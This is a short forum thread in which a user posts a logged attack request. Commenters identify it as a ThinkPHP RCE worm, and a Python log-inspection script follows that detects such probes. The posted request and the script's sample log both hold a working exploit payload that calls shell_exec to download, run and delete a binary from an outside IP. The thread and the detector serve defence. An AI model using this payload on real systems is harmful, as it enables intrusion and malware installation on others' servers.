I was attacked, Intrusion
Attacked by something strange
weiwhy
2021-01-14 11:06:17
GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://5.188.0.27/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Uirusu/2.0


Comments

qia0dan
2021-01-29 18:58:57
Probably a TP5 RCE worm.

AL01
2021-01-20 16:28:09

maria
Intelligence Analyst
2021-01-14 11:29:59
Normal. It's just a worm that spreads by exploiting the ThinkPHP vulnerability, wandering blindly around the internet.
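
A log check for the request shown in the original post, added here as an example and not part of the thread: it decodes each request target before matching the \think\app/invokefunction route, then reports the callable, the download host and the User-Agent. The combined access-log format, the names inspect and parse_query, the client addresses and the second and third log lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

REQ = re.compile(r'"(?:GET|POST) (?P<target>.+) HTTP/\d\.\d"')
ROUTE = re.compile(r"[\\/]think[\\/]app[\\/]invokefunction", re.I)
URL = re.compile(r"https?://([^/\s'\";]+)[^\s'\";]*", re.I)

def parse_query(target):
    """Split on '&' only, so ';' inside a shell payload stays in one value."""
    params = {}
    for pair in target.partition("?")[2].split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def inspect(log_line):
    """Return a finding for a ThinkPHP invokefunction probe, or None."""
    m = REQ.search(log_line)
    if not m:
        return None
    params = parse_query(m.group("target"))
    # Match on the decoded route so percent-encoded probes are not missed.
    if not any(ROUTE.search(s) for s in params.get("s", [])):
        return None
    args = " ".join(params.get("vars[1][]", []))
    return {
        "client": log_line.split(" ", 1)[0],
        "callable": (params.get("vars[0]") or [""])[0],
        "download_hosts": sorted(set(URL.findall(args))),
        # Assumes combined log format, where the User-Agent is the last quoted field.
        "user_agent": log_line.rsplit('"', 2)[-2],
    }

# Constructed log lines: the first wraps the request from the post, the second
# is a percent-encoded variant with a documentation address, the third is benign.
SAMPLE_LOG = r'''
198.51.100.7 - - [14/Jan/2021:11:06:17 +0800] "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://5.188.0.27/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 404 162 "-" "Uirusu/2.0"
198.51.100.8 - - [14/Jan/2021:11:07:02 +0800] "GET /index.php?s=%2Findex%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=shell_exec&vars%5B1%5D%5B%5D=wget%20http%3A%2F%2F192.0.2.10%2Fbins%2Fx86 HTTP/1.1" 404 162 "-" "curl/7.68.0"
198.51.100.9 - - [14/Jan/2021:11:08:40 +0800] "GET /index.php?s=/index/news/list&page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
'''.strip().splitlines()

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        finding = inspect(line)
        if finding:
            print(finding)
```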